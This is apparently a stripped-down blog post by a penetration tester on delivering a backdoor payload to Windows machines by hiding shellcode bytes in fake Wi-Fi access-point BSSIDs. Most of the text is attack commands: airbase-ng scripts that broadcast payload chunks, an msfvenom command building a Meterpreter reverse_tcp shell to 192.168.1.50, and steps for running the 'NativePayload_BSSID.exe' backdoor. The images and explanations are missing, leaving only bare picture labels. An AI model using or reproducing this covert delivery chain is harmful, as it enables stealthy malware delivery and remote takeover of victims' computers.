Transferring Backdoor Payloads with BSSID by Wireless Traffic

Transferring Backdoor Payloads with BSSID by Wireless Traffic

ifconfig wlan0 down
iw reg set BO
ifconfig wlan0 up
iwconfig wlan0 txpower 30
#!/bin/bash
airbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon ;
airbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon ;
#!/bin/bash
sleep 15 ;
killall airbase-ng ;
sleep 15 ;
killall airbase-ng ;
Picture A:
BSSID  = 00:fc:48:83:e4:f0 {5 bytes} ==> fc-48-83-e4-f0
BSSID Flag for Start  =  00:ff:ff:ff:ff:ff
BSSID Flag for Finish = 00:ff:00:ff:00:ff
Picture B:
Picture C:
msfvenom -a x86_64  --platform windows -p windows/x64/meterpreter/reverse_tcp 
lhost=192.168.1.50 -f c > payload.txt
Picture 1:
syntax : c:\> NativePayload.exe null “fc4883e4...”
Picture 1–1:
Picture 2:
Picture 3:
Step AA : Meterpreter Listener executed (linux)Step BB : script1.sh should be run (linux)Step CC : Backdoor “NativePayload_BSSID.exe” should be run (Windows)Step DD : script2.sh should be run (linux)
NativePayload_BSSID.exe “essid”
c:\> NativePayload_BSSID.exe “Fake”
Picture 4:
Picture 5: Transferring Backdoor Payload by BSSID and Wireless Traffic
Picture 6:
Picture 7:

--

--

Security Researcher , Pentester

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store